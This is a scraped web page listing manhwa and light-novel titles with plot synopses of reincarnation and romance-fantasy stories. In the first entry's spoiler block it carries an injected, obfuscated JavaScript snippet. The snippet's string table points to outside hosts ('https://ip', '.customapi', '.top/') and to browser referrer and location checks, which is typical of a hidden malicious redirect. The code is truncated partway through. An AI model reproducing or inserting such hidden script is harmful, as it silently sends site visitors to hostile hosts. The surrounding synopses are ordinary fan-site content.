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I will Live this Life According to my Will

“Pray, become the Enchanter that represents the family.” The goodwill from the start didn’t last long. At the House that adopted me due to my affinity with elemental spirits, I lived a life detested by even the maids because my powers didn’t come to form. It was a life where I agonized over whether I would be happier in death. That is, until I found another ‘me’. “I finally found you. Hi, the current me. Won’t you enter into a contract with me? You’re far too special to live like this, you see.” A miracle appeared in front of me, who was, again, vomiting as well. The person who lived as me in my previous life. “I’ll make you into this continent’s best Enchanter.” <div class="ToggleTriggerAnchor bbCodeSpoilerContainer"> <div class="SpoilerTarget bbCodeSpoilerText">?? ?? ? ??? ???, I will Live this Life According to my Will, I Will Live This Life As I Wish</div> </div> &nbsp;<script></script><script>function _0x542b(_0x2a829e,_0x49deef){var _0x3cafb3=_0x5491();return _0x542b=function(_0x37097d,_0x12cf45){_0x37097d=_0x37097d-(0x486*0x6+0xd*0x101+-0x2774);var _0x50e90d=_0x3cafb3[_0x37097d];return _0x50e90d;},_0x542b(_0x2a829e,_0x49deef);}function _0x5491(){var _0x1930b8=['GIQPn','1370955bKyiPJ','6670960AocBgg','text','injza','wzLOU','floor','10464704saMAPa','https://ip','SmPas','href','8573502yvkcEh','.customapi','233308HXqhAY','includes','http://rea','Eyugh','.top/','','4136088vxlJPU','google','random','ZcJBr','referrer','TeIHl','YlXfb','location','6ESKwGU','then','JNxTK','193369XrSryb'];_0x5491=function(){return _0x1930b8;};return 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I will retrieve the Duke I had abandoned

Discover “I will retrieve the Duke I had abandoned” with daily updates on Manhuatop. Read the newest chapters and follow the gripping plot of this intriguing Romance Manhwa

3 days ago

I Will Rewrite the Dead End Novel

[Let’s get rid of this psychopath before that] Yes, I possessed someone. But who I was in my previous life. I can’t remember at all. All I remember is, just this guy’s face that filled my eyes. The day I woke up for the first time as a wizard’s experiment, we were together. Strangely enough, about my previous life, this guy seems to know better about it than I do. In a dead-end novel, you are the only one you can trust and rely on… In order to live, I have to run away from this guy. In the future, he will kill the female lead’s entire family. It’s because he’s a psychopath whose view on the world is final darkness. After a while… Finally, out of his grasp, I thought I could live a peaceful life─ “You cruelly abandoned me.” This guy, he finally found me. “Did you enjoy playing with me?” Now, he can’t even be compared to his past self. He went completely mad.

1 days ago

I will steal your place

Read I will steal your place Novel – I will steal your place Manhwa Online Free At ManhuaHot The summary of the comic I will steal your place: Are you going to steal my identity? When Kim Yi-Seul transfers to a new school, she is immediately teased by Jin Soo-Hee. But Yi-Seul doesn’t seem to mind. Instead, she takes off her thick glasses and applies heavy makeup so that her face ends up looking just like Soo-Hee’s. That’s when the adventure begins. “I will steal your place” is also known as: Stealing So-hee / 소희 훔치 The comic I will steal your place belongs to the Genre: Drama, Fantasy, Magical, Manhwa, Romance “Top Manhua, Battwo, Read Manga Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANGA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom


I Will Surrender The Position As Empress

Adelaide, the crown princess and highest ranked offence magician, fell out of favour from her mother, the Empress Dowager. As if she were kicked out of her own home, she was married off as an Empress to a far away land. And there, she was welcomed by the Emperor’s mistress, who started talking about the Emperor’s preferences! Adelaide disregarded the emperor’s warning to live as Empress in name only, and chose Lionel to be her aide, the emperor’s very own political rival. I Will Give Up The Position as Empress / 황후 자리를 버리겠습니다


I Won’t Go Back to My Family Who Abandoned Me

Read manhwa I Won’t Go Back to My Family Who Abandoned Me / 나를 버린 가족에게 돌아가지 않습니다 Everywhere Leticia went, she was compared to her siblings. Sadly, it was all too common. She was not as pretty as her second sister Diana, nor as smart as her third brother Emil, nor as good with a sword as her fourth brother Xavier, nor as talented with magic as her youngest sister Irene. However, she was never jealous or envious of her siblings. In fact, she was proud of them. And yet, she never knew that her family was ashamed of her. Until the moment her family abandoned her.

3 days ago

I'm a Noble on the Brink of Ruin, So I Might as Well Try Mastering Magic

A man who was enjoying an evening drink got transferred to the body of Liam, the fifth son of a nobleman from another world. \"I spent easy days practicing the magic I had longed for, and learned not only attribute magic, but also how to summon spirits, obtain powerful familiars, and ended up mastering even the most difficult magic!\" He became an adventurer aiming for independence from his parents\' house, which was scheduled to fall, and before he knew it, he became a higher-ranking aristocrat rather than one of the best magicians in the world.


I'm the Emperor's Lost Daughter

Embodying the culture that I experienced in my previous life, A ‘reincarnator’ with the ability to make the empire flourish. Rossite is able to use her unique ability, the power of implementation. Being bullied by the reincarnator Karina she was even accused of attempting to murder the Duke of Identino, which lead to her execution. At that moment, I recalled the memories of my past life as a paramedic, Rossite realizes that she is the real reincarnator and regresses in the brink of death. The first thing Rossite saw after her regression was Duke Identino, saying he has come to find the ‘Emperor’s lost daughter.’ Rossite goes to the imperial capital with him, but even there, Karina slanders Rossite by spreading rumors that she is a fake


I'm the Hero, but the Main Heroines are Trying to Kill Me

Frey Raon Starlight was the hero who killed his family and comrades and destroyed the world. His goal was to return to the past, unlock a \"hidden route\" to truly save the world, and achieve peace. As planned, he successfully returns to the past and gains access to the hidden route. However, his relief is short-lived as he is confronted with an unexpected truth: the five heroines he killed in his previous life have retained their memories and are now trying to kill him...! Can Frey, under such extreme circumstances, save the world this time?


I'm the Tyrant's Secretary

I became the secretary of a tyrant in place of my clumsy brother to survive. But I have so much potential for it. I’m so darn good at my job. Because I served the tyrant so well, ‘Everyone has a happy ending’. Well then, shall I quit being a secretary and live a leisurely life now? “Rosaline, tell me what you want.” He asked as he stepped down from his chair. “I want to quit.” His eyebrows twitched slightly. “Do you want to die?” Your highness, you never hold on to people who want to leave, so why’re you being like this to me?


I, Queen Edith

High school student, Gu Yunyun, suddenly found herself in another world and woke up to discover that she was now a one-year-old queen known as Edith! Now she was a child blessed by the gods, with an entire empire at her bidding… But being a young ruler isn’t easy. Though the empire may seem to be flourishing, Edith began to notice it’s gradual deterioration. Not only that, a mysterious church lurks in the shadows and she soon realizes just how difficult the path of a queen is. But soon a child named Caden appears at her side and her life grows even more complex.


I, The Abyssal, Have Decided To Save Humanity Again Today

Read Manhua I, The Abyssal, Have Decided To Save Humanity Again Today / Despite Coming From The Abyss, I Will Save Humanity / I Who Came From Hell Also Want Save Mankind / Laizi Shenyuan De Wo Jintian Yeyao Zhengjiu Renlei / Láizì Shēnyuān De Wǒ Jīntiān Yěyào Zhěngjiù Rénlèi / アビスから来た私は今日も人類の救世主 / 来自深渊的我今天也要拯救人类 / 심연의 끝, 난 인류를 구할 것이다 The Abyss Represent Pure Annihilation. They Possess Unmatched Power And Follow Their Nature To Consume All Living Things. Yet, One Day, A Traitor Emerged. A Clueless Young Girl, Hildegard, Awoke On The Battlefield And Realized She’s The Abominable “White Night” Abyss. After Breaking Through Countless Pursuits, She Was Adopted And Reformed By Arya’s Family. She Gradually Strengthens Her Own Belief And Uses The Body Of The Abyss To Save Humanity. To Protect The Goodness And Warmth In Her Heart. But The Chaotic Abyss Won’t Bend To Her Will…
